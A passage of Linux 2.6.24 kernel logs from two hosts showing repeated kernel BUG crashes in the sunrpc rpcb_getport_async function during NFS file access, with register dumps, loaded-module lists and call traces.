:sunrpc:rpc_sleep_on+0x150/0x2b0 May 19 01:40:45 heura6 kernel: [462902.542278] [sunrpc:__rpc_execute+0x6b/0x290] :sunrpc:__rpc_execute+0x6b/0x290 May 19 01:40:45 heura6 kernel: [462902.542317] [sunrpc:rpc_async_schedule+0x0/0x10] :sunrpc:rpc_async_schedule+0x0/0x10 May 19 01:40:45 heura6 kernel: [462902.542351] [run_workqueue+0xcc/0x170] run_workqueue+0xcc/0x170 May 19 01:40:45 heura6 kernel: [462902.542379] [worker_thread+0x0/0x110] worker_thread+0x0/0x110 May 19 01:40:45 heura6 kernel: [462902.542407] [worker_thread+0x0/0x110] worker_thread+0x0/0x110 May 19 01:40:45 heura6 kernel: [462902.542435] [worker_thread+0xa3/0x110] worker_thread+0xa3/0x110 May 19 01:40:45 heura6 kernel: [462902.542464] [&lt;ffffffff80254520&gt;] autoremove_wake_function+0x0/0x30 May 19 01:40:45 heura6 kernel: [462902.542494] [worker_thread+0x0/0x110] worker_thread+0x0/0x110 May 19 01:40:45 heura6 kernel: [462902.542522] [worker_thread+0x0/0x110] worker_thread+0x0/0x110 May 19 01:40:45 heura6 kernel: [462902.542549] [kthread+0x4b/0x80] kthread+0x4b/0x80 May 19 01:40:45 heura6 kernel: [462902.542577] [child_rip+0xa/0x12] child_rip+0xa/0x12 May 19 01:40:45 heura6 kernel: [462902.542606] [kthread+0x0/0x80] kthread+0x0/0x80 May 19 01:40:45 heura6 kernel: [462902.542633] [child_rip+0x0/0x12] child_rip+0x0/0x12 May 19 01:40:45 heura6 kernel: [462902.542659] May 19 01:40:45 heura6 kernel: [462902.542678] May 19 01:40:45 heura6 kernel: [462902.542678] Code: 0f 0b eb fe 8b 85 b8 00 00 00 0f b7 b7 48 01 00 00 48 c7 c2 May 19 01:40:45 heura6 kernel: [462902.544357] RIP [sunrpc:rpcb_getport_async+0x272/0x3c0] :sunrpc:rpcb_getport_async+0x272/0x3c0 May 19 01:40:45 heura6 kernel: [462902.544398] RSP &lt;ffff810255463e20&gt; May 19 01:40:45 heura6 kernel: [462902.544660] ---[ end trace d3438eb0ca119884 ]--- May 19 01:40:45 heura6 kernel: [462902.544698] ------------[ cut here ]------------ May 19 01:40:45 heura6 kernel: [462902.544702] kernel BUG at /build/buildd/linux-2.6.24/net/sunrpc/rpcb_clnt.c:322! May 19 01:40:45 heura6 kernel: [462902.544706] invalid opcode: 0000 [2] SMP May 19 01:40:45 heura6 kernel: [462902.544709] CPU 0 May 19 01:40:45 heura6 kernel: [462902.544711] Modules linked in: autofs4 ipv6 nfs iptable_filter ip_tables x_tables nfsd lockd nfs_acl auth_rpcgss sunrpc exportfs parport_pc lp parport af_packet psmouse serio_raw shpchp iTCO_wdt i5000_edac button iTCO_vendor_support evdev edac_core pci_hotplug pcspkr ext3 jbd mbcache sg sd_mod ata_piix pata_acpi ata_generic libata scsi_mod ehci_hcd uhci_hcd usbcore e1000 raid10 raid456 async_xor async_memcpy async_tx xor raid1 raid0 multipath linear md_mod dm_mirror dm_snapshot dm_mod thermal processor fan fbcon tileblit font bitblit softcursor fuse May 19 01:40:45 heura6 kernel: [462902.544765] Pid: 1987, comm: mhtrain Tainted: G D 2.6.24-24-server #1 May 19 01:40:45 heura6 kernel: [462902.544767] RIP: 0010:[sunrpc:rpcb_getport_async+0x272/0x3c0] [sunrpc:rpcb_getport_async+0x272/0x3c0] :sunrpc:rpcb_getport_async+0x272/0x3c0 May 19 01:40:45 heura6 kernel: [462902.544789] RSP: 0018:ffff8101b4885988 EFLAGS: 00010206 May 19 01:40:45 heura6 kernel: [462902.544791] RAX: ffffffff882e45c0 RBX: ffff8102549a4400 RCX: 00000000c0000100 May 19 01:40:45 heura6 kernel: [462902.544793] RDX: 0000000000000000 RSI: 00000000ffffff95 RDI: ffff8101b49dfc00 May 19 01:40:45 heura6 kernel: [462902.544794] RBP: ffff8102538c5000 R08: ffff8101b4884000 R09: 0000000000000002 May 19 01:40:45 heura6 kernel: [462902.544796] R10: ffff810001039c60 R11: ffffffff882c6640 R12: ffff8102549a4a00 May 19 01:40:45 heura6 kernel: [462902.544798] R13: ffff8101b49dfc00 R14: ffff8101b4885af8 R15: ffff8101b4885bc8 May 19 01:40:45 heura6 kernel: [462902.544801] FS: 00007f609c1926e0(0000) GS:ffffffff805c5000(0000) knlGS:0000000000000000 May 19 01:40:45 heura6 kernel: [462902.544803] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 May 19 01:40:45 heura6 kernel: [462902.544805] CR2: 00007f609b999000 CR3: 00000001b4911000 CR4: 00000000000006e0 May 19 01:40:45 heura6 kernel: [462902.544806] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 May 19 01:40:45 heura6 kernel: [462902.544808] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 May 19 01:40:45 heura6 kernel: [462902.544810] Process mhtrain (pid: 1987, threadinfo ffff8101b4884000, task ffff8102512637d0) May 19 01:40:45 heura6 kernel: [462902.544812] Stack: ffff8102538c5338 ffff8102538c5000 ffff8101b49dfc00 ffff8102549a4400 May 19 01:40:45 heura6 kernel: [462902.544820] 0000000000000000 ffff8101b49dfc00 ffffffff882cc390 ffff8101b49dfcf0 May 19 01:40:45 heura6 kernel: [462902.544824] ffff8101b4885af8 ffffffff882bdb3b ffffffff882cc390 ffff8101b49dfc00 May 19 01:40:45 heura6 kernel: [462902.544829] Call Trace: May 19 01:40:45 heura6 kernel: [462902.544846] [sunrpc:__rpc_execute+0x6b/0x290] :sunrpc:__rpc_execute+0x6b/0x290 May 19 01:40:45 heura6 kernel: [462902.544859] [sunrpc:rpc_do_run_task+0x76/0xd0] :sunrpc:rpc_do_run_task+0x76/0xd0 May 19 01:40:45 heura6 kernel: [462902.544873] [sunrpc:rpc_call_sync+0x15/0x40] :sunrpc:rpc_call_sync+0x15/0x40 May 19 01:40:45 heura6 kernel: [462902.544891] [nfs:_nfs4_proc_getattr+0x65/0x70] :nfs:_nfs4_proc_getattr+0x65/0x70 May 19 01:40:45 heura6 kernel: [462902.544899] [sunrpc:recalc_sigpending+0xe/0x40] recalc_sigpending+0xe/0x40 May 19 01:40:45 heura6 kernel: [462902.544912] [nfs:nfs4_proc_getattr+0x32/0x60] :nfs:nfs4_proc_getattr+0x32/0x60 May 19 01:40:45 heura6 kernel: [462902.544915] [sunrpc:recalc_sigpending+0xe/0x40] recalc_sigpending+0xe/0x40 May 19 01:40:45 heura6 kernel: [462902.544927] [nfs:__nfs_revalidate_inode+0x1cd/0x300] :nfs:__nfs_revalidate_inode+0x1cd/0x300 May 19 01:40:45 heura6 kernel: [462902.544933] [__link_path_walk+0xaf9/0xe90] __link_path_walk+0xaf9/0xe90 May 19 01:40:45 heura6 kernel: [462902.544948] [sunrpc:rpcauth_lookup_credcache+0xa8/0x230] :sunrpc:rpcauth_lookup_credcache+0xa8/0x230 May 19 01:40:45 heura6 kernel: [462902.544960] [nfs:nfs_do_access+0x32/0x350] :nfs:nfs_do_access+0x32/0x350 May 19 01:40:45 heura6 kernel: [462902.544965] [nfs:dput+0x1f/0x170] dput+0x1f/0x130 May 19 01:40:45 heura6 kernel: [462902.544975] [nfs:nfs_open_revalidate+0x81/0x1d0] :nfs:nfs_open_revalidate+0x81/0x1d0 May 19 01:40:45 heura6 kernel: [462902.544989] [nfs:nfs_revalidate_mapping_nolock+0x47/0xa0] :nfs:nfs_revalidate_mapping_nolock+0x47/0xa0 May 19 01:40:45 heura6 kernel: [462902.545002] [nfs:nfs_follow_link+0x1c/0x90] :nfs:nfs_follow_link+0x1c/0x90 May 19 01:40:45 heura6 kernel: [462902.545007] [__link_path_walk+0xcb2/0xe90] __link_path_walk+0xcb2/0xe90 May 19 01:40:45 heura6 kernel: [462902.545013] [link_path_walk+0x5b/0x100] link_path_walk+0x5b/0x100 May 19 01:40:45 heura6 kernel: [462902.545022] [get_unused_fd_flags+0x77/0x120] get_unused_fd_flags+0x77/0x120 May 19 01:40:45 heura6 kernel: [462902.545027] [do_path_lookup+0x8a/0x250] do_path_lookup+0x8a/0x250 May 19 01:40:45 heura6 kernel: [462902.545031] [__path_lookup_intent_open+0x6a/0xd0] __path_lookup_intent_open+0x6a/0xd0 May 19 01:40:45 heura6 kernel: [462902.545036] [open_namei+0x89/0x710] open_namei+0x89/0x710 May 19 01:40:45 heura6 kernel: [462902.545040] [__dequeue_entity+0x3d/0x50] __dequeue_entity+0x3d/0x50 May 19 01:40:45 heura6 kernel: [462902.545044] [__switch_to+0x1ba/0x310] __switch_to+0x1ba/0x310 May 19 01:40:45 heura6 kernel: [462902.545049] [do_filp_open+0x1c/0x50] do_filp_open+0x1c/0x50 May 19 01:40:45 heura6 kernel: [462902.545055] [get_unused_fd_flags+0x77/0x120] get_unused_fd_flags+0x77/0x120 May 19 01:40:45 heura6 kernel: [462902.545060] [do_sys_open+0x5a/0xf0] do_sys_open+0x5a/0xf0 May 19 01:40:45 heura6 kernel: [462902.545064] [system_call+0x7e/0x83] system_call+0x7e/0x83 May 19 01:40:45 heura6 kernel: [462902.545069] May 19 01:40:45 heura6 kernel: [462902.545070] May 19 01:40:45 heura6 kernel: [462902.545071] Code: 0f 0b eb fe 8b 85 b8 00 00 00 0f b7 b7 48 01 00 00 48 c7 c2 May 19 01:40:45 heura6 kernel: [462902.545081] RIP [sunrpc:rpcb_getport_async+0x272/0x3c0] :sunrpc:rpcb_getport_async+0x272/0x3c0 May 19 01:40:45 heura6 kernel: [462902.545095] RSP &lt;ffff8101b4885988&gt; May 19 01:40:45 heura6 kernel: [462902.545097] ---[ end trace d3438eb0ca119884 ]--- May 19 01:40:45 heura6 kernel: [462902.553615] ------------[ cut here ]------------ May 19 01:40:45 heura6 kernel: [462902.553676] kernel BUG at /build/buildd/linux-2.6.24/net/sunrpc/rpcb_clnt.c:322! May 19 01:40:45 heura6 kernel: [462902.553751] invalid opcode: 0000 [3] SMP May 19 01:40:45 heura6 kernel: [462902.553870] CPU 0 May 19 01:40:45 heura6 kernel: [462902.553952] Modules linked in: autofs4 ipv6 nfs iptable_filter ip_tables x_tables nfsd lockd nfs_acl auth_rpcgss sunrpc exportfs parport_pc lp parport af_packet psmouse serio_raw shpchp iTCO_wdt i5000_edac button iTCO_vendor_support evdev edac_core pci_hotplug pcspkr ext3 jbd mbcache sg sd_mod ata_piix pata_acpi ata_generic libata scsi_mod ehci_hcd uhci_hcd usbcore e1000 raid10 raid456 async_xor async_memcpy async_tx xor raid1 raid0 multipath linear md_mod dm_mirror dm_snapshot dm_mod thermal processor fan fbcon tileblit font bitblit softcursor fuse May 19 01:40:45 heura6 kernel: [462902.556271] Pid: 3662, comm: bernoulli_local Tainted: G D 2.6.24-24-server #1 May 19 01:40:45 heura6 kernel: [462902.556345] RIP: 0010:[sunrpc:rpcb_getport_async+0x272/0x3c0] [sunrpc:rpcb_getport_async+0x272/0x3c0] :sunrpc:rpcb_getport_async+0x272/0x3c0 May 19 01:40:45 heura6 kernel: [462902.556474] RSP: 0018:ffff8101a1fe57c8 EFLAGS: 00010206 May 19 01:40:45 heura6 kernel: [462902.556530] RAX: ffffffff882e45c0 RBX: ffff8102549a4400 RCX: ffff8102599cb180 May 19 01:40:45 heura6 kernel: [462902.556604] RDX: ffff8102599cb180 RSI: ffff8102599cb1a8 RDI: ffff8101b49df900 May 19 01:40:45 heura6 kernel: [462902.556677] RBP: ffff8102538c5000 R08: ffff810001036900 R09: 000000000000006b May 19 01:40:45 heura6 kernel: [462902.556751] R10: 0000000000000001 R11: ffffffff882c6640 R12: ffff8102549a4a00 May 19 01:40:45 heura6 kernel: [462902.556824] R13: ffff8101b49df900 R14: ffff8101a1fe5898 R15: ffff8101a1fe59c8 May 19 01:40:45 heura6 kernel: [462902.556898] FS: 00007f2444d626e0(0000) GS:ffffffff805c5000(0000) knlGS:0000000000000000 May 19 01:40:45 heura6 kernel: [462902.556973] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b May 19 01:40:45 heura6 kernel: [462902.557030] CR2: 00000000006e3b88 CR3: 00000001018a2000 CR4: 00000000000006e0 May 19 01:40:45 heura6 kernel: [462902.557104] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 May 19 01:40:45 heura6 kernel: [462902.557177] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 May 19 01:40:45 heura6 kernel: [462902.557251] Process bernoulli_local (pid: 3662, threadinfo ffff8101a1fe4000, task ffff8102530657d0) May 19 01:40:45 heura6 kernel: [462902.557327] Stack: ffff8101b49df900 ffffffff883bc178 ffff810250c54a80 ffffffff882b78c0 May 19 01:40:45 heura6 kernel: [462902.557564] 0000000000000000 ffff8101b49df900 ffffffff882cc390 ffff8101b49df9f0 May 19 01:40:45 heura6 kernel: [462902.557767] ffff8101a1fe5898 ffffffff882bdb3b ffffffff882cc390 ffff8101b49df900 May 19 01:40:45 heura6 kernel: [462902.557924] Call Trace: May 19 01:40:45 heura6 kernel: [462902.558033] [sunrpc:call_allocate+0xc0/0x1b0] :sunrpc:call_allocate+0xc0/0x1b0 May 19 01:40:45 heura6 kernel: [462902.558103] [sunrpc:__rpc_execute+0x6b/0x290] :sunrpc:__rpc_execute+0x6b/0x290 May 19 01:40:45 heura6 kernel: [462902.558173] [sunrpc:rpc_do_run_task+0x76/0xd0] :sunrpc:rpc_do_run_task+0x76/0xd0 May 19 01:40:45 heura6 kernel: [462902.558247] [nfs:decode_getfattr+0x89e/0x1140] :nfs:decode_getfattr+0x89e/0x1140 May 19 01:40:45 heura6 kernel: [462902.558317] [sunrpc:rpc_call_sync+0x15/0x40] :sunrpc:rpc_call_sync+0x15/0x40 May 19 01:40:45 heura6 kernel: [462902.558386] [nfs:nfs4_proc_access+0x8f/0x1e0] :nfs:nfs4_proc_access+0x8f/0x1e0 May 19 01:40:45 heura6 kernel: [462902.558457] [nfs:nfs4_xdr_dec_getattr+0x0/0x60] :nfs:nfs4_xdr_dec_getattr+0x0/0x60 May 19 01:40:45 heura6 kernel: [462902.558526] [nfs:nfs4_xdr_dec_getattr+0x4f/0x60] :nfs:nfs4_xdr_dec_getattr+0x4f/0x60 May 19 01:40:45 heura6 kernel: [462902.558591] [__wait_on_bit+0x6b/0x80] __wait_on_bit+0x6b/0x80 May 19 01:40:45 heura6 kernel: [462902.558651] [__wake_up_common+0x5a/0x90] __wake_up_common+0x5a/0x90 May 19 01:40:45 heura6 kernel: [462902.558713] [__slab_free+0x1fe/0x350] __slab_free+0x1fe/0x350 May 19 01:40:45 heura6 kernel: [462902.558780] [nfs:nfs_do_access+0xda/0x350] :nfs:nfs_do_access+0xda/0x350 May 19 01:40:45 heura6 kernel: [462902.558850] [nfs:nfs_permission+0xd8/0x1a0] :nfs:nfs_permission+0xd8/0x1a0 May 19 01:40:45 heura6 kernel: [462902.558912] [nfsd:permission+0xb0/0x1b0] permission+0xb0/0x160 May 19 01:40:45 heura6 kernel: [462902.558970] [__link_path_walk+0x87/0xe90] __link_path_walk+0x87/0xe90 May 19 01:40:45 heura6 kernel: [462902.559032] [link_path_walk+0x5b/0x100] link_path_walk+0x5b/0x100 May 19 01:40:45 heura6 kernel: [462902.559090] [getname+0x33/0x220] getname+0x33/0x220 May 19 01:40:45 heura6 kernel: [462902.559150] [get_unused_fd_flags+0x77/0x120] get_unused_fd_flags+0x77/0x120 May 19 01:40:45 heura6 kernel: [462902.559211] [__link_path_walk+0x66a/0xe90] __link_path_walk+0x66a/0xe90 May 19 01:40:45 heura6 kernel: [462902.559273] [link_path_walk+0x5b/0x100] link_path_walk+0x5b/0x100 May 19 01:40:45 heura6 kernel: [462902.559331] [getname+0x33/0x220] getname+0x33/0x220 May 19 01:40:45 heura6 kernel: [462902.559390] [get_unused_fd_flags+0x77/0x120] get_unused_fd_flags+0x77/0x120 May 19 01:40:45 heura6 kernel: [462902.559451] [do_path_lookup+0x8a/0x250] do_path_lookup+0x8a/0x250 May 19 01:40:45 heura6 kernel: [462902.559511] [__path_lookup_intent_open+0x6a/0xd0] __path_lookup_intent_open+0x6a/0xd0 May 19 01:40:45 heura6 kernel: [462902.559571] [open_namei+0xfa/0x710] open_namei+0xfa/0x710 May 19 01:40:45 heura6 kernel: [462902.559630] [do_page_fault+0x1d0/0x840] do_page_fault+0x1d0/0x840 May 19 01:40:45 heura6 kernel: [462902.559690] [do_filp_open+0x1c/0x50] do_filp_open+0x1c/0x50 May 19 01:40:45 heura6 kernel: [462902.559747] [getname+0x33/0x220] getname+0x33/0x220 May 19 01:40:45 heura6 kernel: [462902.559807] [get_unused_fd_flags+0x77/0x120] get_unused_fd_flags+0x77/0x120 May 19 01:40:45 heura6 kernel: [462902.559867] [do_sys_open+0x5a/0xf0] do_sys_open+0x5a/0xf0 May 19 01:40:45 heura6 kernel: [462902.559926] [system_call+0x7e/0x83] system_call+0x7e/0x83 May 19 01:40:45 heura6 kernel: [462902.559985] May 19 01:40:45 heura6 kernel: [462902.560034] May 19 01:40:45 heura6 kernel: [462902.560034] Code: 0f 0b eb fe 8b 85 b8 00 00 00 0f b7 b7 48 01 00 00 48 c7 c2 May 19 01:40:45 heura6 kernel: [462902.560831] RIP [sunrpc:rpcb_getport_async+0x272/0x3c0] :sunrpc:rpcb_getport_async+0x272/0x3c0 May 19 01:40:45 heura6 kernel: [462902.560933] RSP &lt;ffff8101a1fe57c8&gt; May 19 01:40:45 heura6 kernel: [462902.560996] ---[ end trace d3438eb0ca119884 ]--- ------------------------------------------------------------- ------------------------------------------------------------- heura 8 kern.log ---------------- May 19 01:39:39 heura8 kernel: [462824.028797] ------------[ cut here ]------------ May 19 01:39:39 heura8 kernel: [462824.028842] kernel BUG at /build/buildd/linux-2.6.24/net/sunrpc/rpcb_clnt.c:322! May 19 01:39:39 heura8 kernel: [462824.028886] invalid opcode: 0000 [1] SMP May 19 01:39:39 heura8 kernel: [462824.028914] CPU 3 May 19 01:39:39 heura8 kernel: [462824.028936] Modules linked in: autofs4 ipv6 nfs iptable_filter ip_tables x_tables nfsd lockd nfs_acl auth_rpcgss sunrpc exportfs parport_pc lp parport af_packet psmouse serio_raw evdev iTCO_wdt iTCO_vendor_support button i5000_edac edac_core shpchp pci_hotplug pcspkr ext3 jbd mbcache sg sd_mod ata_piix pata_acpi ehci_hcd ata_generic uhci_hcd usbcore libata scsi_mod e1000 raid10 raid456 async_xor async_memcpy async_tx xor raid1 raid0 multipath linear md_mod dm_mirror dm_snapshot dm_mod thermal processor fan fbcon tileblit font bitblit softcursor fuse May 19 01:39:39 heura8 kernel: [462824.029239] Pid: 6549, comm: mhrecognise Not tainted 2.6.24-24-server #1 May 19 01:39:39 heura8 kernel: [462824.029268] RIP: 0010:[sunrpc:rpcb_getport_async+0x272/0x3c0] [sunrpc:rpcb_getport_async+0x272/0x3c0] :sunrpc:rpcb_getport_async+0x272/0x3c0 May 19 01:39:39 heura8 kernel: [462824.029336] RSP: 0018:ffff81022fd7b7c8 EFLAGS: 00010287 May 19 01:39:39 heura8 kernel: [462824.029363] RAX: ffffffff882e65c0 RBX: ffff810250cb2e00 RCX: 00000000c0000100 May 19 01:39:39 heura8 kernel: [462824.029406] RDX: 0000000000000000 RSI: 0000000000000286 RDI: ffff81025201cd80 May 19 01:39:39 heura8 kernel: [462824.029450] RBP: ffff8102539d2800 R08: ffff81022fd7a000 R09: 0000000000000000 May 19 01:39:39 heura8 kernel: [462824.029493] R10: ffff81000105ac60 R11: ffffffff882c8640 R12: ffff810250cb2400 May 19 01:39:39 heura8 kernel: [462824.029537] R13: ffff81025201cd80 R14: ffff81022fd7b898 R15: ffff81022fd7b9c8 May 19 01:39:39 heura8 kernel: [462824.029581] FS: 00007f6ca0c026e0(0000) GS:ffff810257401f00(0000) knlGS:0000000000000000 May 19 01:39:39 heura8 kernel: [462824.029626] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 May 19 01:39:39 heura8 kernel: [462824.029653] CR2: 000000000a0c8004 CR3: 00000001667de000 CR4: 00000000000006e0 May 19 01:39:39 heura8 kernel: [462824.029697] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 May 19 01:39:39 heura8 kernel: [462824.029740] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 May 19 01:39:39 heura8 kernel: [462824.029784] Process mhrecognise (pid: 6549, threadinfo ffff81022fd7a000, task ffff8102549b4fe0) May 19 01:39:39 heura8 kernel: [462824.029830] Stack: ffffffff80254550 ffff81022fd7b7d0 0000000000000286 ffff81025201ce10 May 19 01:39:39 heura8 kernel: [462824.029883] 0000000000000000 ffff81025201cd80 ffffffff882ce390 ffff81025201ce70 May 19 01:39:39 heura8 kernel: [462824.029934] ffff81022fd7b898 ffffffff882bfb3b ffffffff882ce390 ffff81025201cd80 May 19 01:39:39 heura8 kernel: [462824.029968] Call Trace: May 19 01:39:39 heura8 kernel: [462824.030010] [&lt;ffffffff80254550&gt;] wake_bit_function+0x0/0x30 May 19 01:39:39 heura8 kernel: [462824.030051] [sunrpc:__rpc_execute+0x6b/0x290] :sunrpc:__rpc_execute+0x6b/0x290 May 19 01:39:39 heura8 kernel: [462824.030090] [sunrpc:rpc_do_run_task+0x76/0xd0] :sunrpc:rpc_do_run_task+0x76/0xd0 May 19 01:39:39 heura8 kernel: [462824.030135] [nfs:decode_getfattr+0x89e/0x1140] :nfs:decode_getfattr+0x89e/0x1140 May 19 01:39:39 heura8 kernel: [462824.030175] [sunrpc:rpc_call_sync+0x15/0x40] :sunrpc:rpc_call_sync+0x15/0x40 May 19 01:39:39 heura8 kernel: [462824.030214] [nfs:nfs4_proc_access+0x8f/0x1e0] :nfs:nfs4_proc_access+0x8f/0x1e0 May 19 01:39:39 heura8 kernel: [462824.030255] [nfs:nfs4_xdr_dec_getattr+0x0/0x60] :nfs:nfs4_xdr_dec_getattr+0x0/0x60 May 19 01:39:39 heura8 kernel: [462824.030294] [nfs:nfs4_xdr_dec_getattr+0x4f/0x60] :nfs:nfs4_xdr_dec_getattr+0x4f/0x60 May 19 01:39:39 heura8 kernel: [462824.030328] [__wait_on_bit+0x6b/0x80] __wait_on_bit+0x6b/0x80 May 19 01:39:39 heura8 kernel: [462824.030357] [__wake_up_common+0x5a/0x90] __wake_up_common+0x5a/0x90 May 19 01:39:39 heura8 kernel: [462824.030399] [nfs:nfs_do_access+0xda/0x350] :nfs:nfs_do_access+0xda/0x350 May 19 01:39:39 heura8 kernel: [462824.030439] [nfs:nfs_permission+0xd8/0x1a0] :nfs:nfs_permission+0xd8/0x1a0 May 19 01:39:39 heura8 kernel: [462824.030471] [nfsd:permission+0xb0/0x1b0] permission+0xb0/0x160 May 19 01:39:39 heura8 kernel: [462824.030500] [__link_path_walk+0x87/0xe90] __link_path_walk+0x87/0xe90 May 19 01:39:39 heura8 kernel: [462824.030531] [link_path_walk+0x5b/0x100] link_path_walk+0x5b/0x100 May 19 01:39:39 heura8 kernel: [462824.030560] [getname+0x33/0x220] getname+0x33/0x220 May 19 01:39:39 heura8 kernel: [462824.030590] [get_unused_fd_flags+0x77/0x120] get_unused_fd_flags+0x77/0x120 May 19 01:39:39 heura8 kernel: [462824.030622] [__link_path_walk+0x66a/0xe90] __link_path_walk+0x66a/0xe90 May 19 01:39:39 heura8 kernel: [462824.030654] [link_path_walk+0x5b/0x100] link_path_walk+0x5b/0x100 May 19 01:39:39 heura8 kernel: [462824.032260] [getname+0x33/0x220] getname+0x33/0x220 May 19 01:39:39 heura8 kernel: [462824.032289] [get_unused_fd_flags+0x77/0x120] get_unused_fd_flags+0x77/0x120 May 19 01:39:39 heura8 kernel: [462824.032318] [__slab_alloc+0x158/0x410] __slab_alloc+0x158/0x410 May 19 01:39:39 heura8 kernel: [462824.032345] [get_empty_filp+0x31/0x150] get_empty_filp+0x31/0x150 May 19 01:39:39 heura8 kernel: [462824.032375] [do_path_lookup+0x8a/0x250] do_path_lookup+0x8a/0x250 May 19 01:39:39 heura8 kernel: [462824.032404] [__path_lookup_intent_open+0x6a/0xd0] __path_lookup_intent_open+0x6a/0xd0 May 19 01:39:39 heura8 kernel: [462824.032435] [open_namei+0x89/0x710] open_namei+0x89/0x710 May 19 01:39:39 heura8 kernel: [462824.032462] [&lt;ffffffff80254520&gt;] autoremove_wake_function+0x0/0x30 May 19 01:39:39 heura8 kernel: [462824.032494] [do_filp_open+0x1c/0x50] do_filp_open+0x1c/0x50 May 19 01:39:39 heura8 kernel: [462824.032522] [getname+0x33/0x220] getname+0x33/0x220 May 19 01:39:39 heura8 kernel: [462824.032551] [get_unused_fd_flags+0x77/0x120] get_unused_fd_flags+0x77/0x120 May 19 01:39:39 heura8 kernel: [462824.032581] [do_sys_open+0x5a/0xf0] do_sys_open+0x5a/0xf0 May 19 01:39:39 heura8 kernel: [462824.032610] [system_call+0x7e/0x83] system_call+0x7e/0x83 May 19 01:39:39 heura8 kernel: [462824.032640] May 19 01:39:39 heura8 kernel: [462824.032659] May 19 01:39:39 heura8 kernel: [462824.032659] Code: 0f 0b eb fe 8b 85 b8 00 00 00 0f b7 b7 48 01 00 00 48 c7 c2 May 19 01:39:39 heura8 kernel: [462824.032758] RIP [sunrpc:rpcb_getport_async+0x272/0x3c0] :sunrpc:rpcb_getport_async+0x272/0x3c0 May 19 01:39:39 heura8 kernel: [462824.032800] RSP &lt;ffff81022fd7b7c8&gt; May 19 01:39:39 heura8 kernel: [462824.033062] ---[ end trace 5d73921843ccffdf ]--- May 19 01:40:43 heura8 kernel: [462886.993115] ------------[ cut here ]------------ May 19 01:40:43 heura8 kernel: [462886.993176] kernel BUG at /build/buildd/linux-2.6.24/net/sunrpc/rpcb_clnt.c:322! May 19 01:40:43 heura8 kernel: [462886.993251] invalid opcode: 0000 [2] SMP May 19 01:40:43 heura8 kernel: [462886.993370] CPU 3 May 19 01:40:43 heura8 kernel: [462886.993452] Modules linked in: autofs4 ipv6 nfs iptable_filter ip_tables x_tables nfsd lockd nfs_acl auth_rpcgss sunrpc exportfs parport_pc lp parport af_packet psmouse serio_raw evdev iTCO_wdt iTCO_vendor_support button i5000_edac edac_core shpchp pci_hotplug pcspkr ext3 jbd mbcache sg sd_mod ata_piix pata_acpi ehci_hcd ata_generic uhci_hcd usbcore libata scsi_mod e1000 raid10 raid456 async_xor async_memcpy async_tx xor raid1 raid0 multipath linear md_mod dm_mirror dm_snapshot dm_mod thermal processor fan fbcon tileblit font bitblit softcursor fuse May 19 01:40:43 heura8 kernel: [462886.995781] Pid: 4429, comm: rpciod/3 Tainted: G D 2.6.24-24-server #1 May 19 01:40:43 heura8 kernel: [462886.995841] RIP: 0010:[sunrpc:rpcb_getport_async+0x272/0x3c0] [sunrpc:rpcb_getport_async+0x272/0x3c0] :sunrpc:rpcb_getport_async+0x272/0x3c0 May 19 01:40:43 heura8 kernel: [462886.995971] RSP: 0018:ffff810256873e20 EFLAGS: 00010287 May 19 01:40:43 heura8 kernel: [462886.996028] RAX: ffffffff882e65c0 RBX: ffff810250cb2e00 RCX: ffff81024a451a08 May 19 01:40:43 heura8 kernel: [462886.996101] RDX: 00000000ffffff95 RSI: 0000000000000286 RDI: ffff81024a451900 May 19 01:40:43 heura8 kernel: [462886.996175] RBP: ffff8102539d2800 R08: ffff810252de1c88 R09: 00000000ffffffff May 19 01:40:43 heura8 kernel: [462886.996248] R10: ffff8100809da000 R11: ffffffff882c8640 R12: ffff810250cb2400 May 19 01:40:43 heura8 kernel: [462886.996322] R13: ffff81024a451900 R14: 0000000000000000 R15: 0000000000000000 May 19 01:40:43 heura8 kernel: [462886.996396] FS: 0000000000000000(0000) GS:ffff810257401f00(0000) knlGS:0000000000000000 May 19 01:40:43 heura8 kernel: [462886.996472] CS: 0010 DS: 0018 ES: 0018 CR0: 000000008005003b May 19 01:40:43 heura8 kernel: [462886.996529] CR2: 00007fe811d58460 CR3: 0000000255413000 CR4: 00000000000006e0 May 19 01:40:43 heura8 kernel: [462886.996602] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 May 19 01:40:43 heura8 kernel: [462886.996676] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 May 19 01:40:43 heura8 kernel: [462886.996751] Process rpciod/3 (pid: 4429, threadinfo ffff810256872000, task ffff81025214e000) May 19 01:40:43 heura8 kernel: [462886.996827] Stack: 0000000000000000 ffff8102539d2800 0000000000000286 ffff81024a451990 May 19 01:40:43 heura8 kernel: [462886.997065] 0000000000000000 ffff81024a451900 ffff810252de1c80 ffff81024a4519f0 May 19 01:40:43 heura8 kernel: [462886.997268] 0000000000000000 ffffffff882bfb3b ffffffffffffffff ffff810252de1c80 May 19 01:40:43 heura8 kernel: [462886.997426] Call Trace: May 19 01:40:43 heura8 kernel: [462886.997537] [sunrpc:__rpc_execute+0x6b/0x290] :sunrpc:__rpc_execute+0x6b/0x290 May 19 01:40:43 heura8 kernel: [462886.997607] [sunrpc:rpc_async_schedule+0x0/0x10] :sunrpc:rpc_async_schedule+0x0/0x10 May 19 01:40:43 heura8 kernel: [462886.997672] [run_workqueue+0xcc/0x170] run_workqueue+0xcc/0x170 May 19 01:40:43 heura8 kernel: [462886.997729] [worker_thread+0x0/0x110] worker_thread+0x0/0x110 May 19 01:40:43 heura8 kernel: [462886.997787] [worker_thread+0x0/0x110] worker_thread+0x0/0x110 May 19 01:40:43 heura8 kernel: [462886.997845] [worker_thread+0xa3/0x110] worker_thread+0xa3/0x110 May 19 01:40:43 heura8 kernel: [462886.997904] [&lt;ffffffff80254520&gt;] autoremove_wake_function+0x0/0x30 May 19 01:40:43 heura8 kernel: [462886.997964] [worker_thread+0x0/0x110] worker_thread+0x0/0x110 May 19 01:40:43 heura8 kernel: [462886.998022] 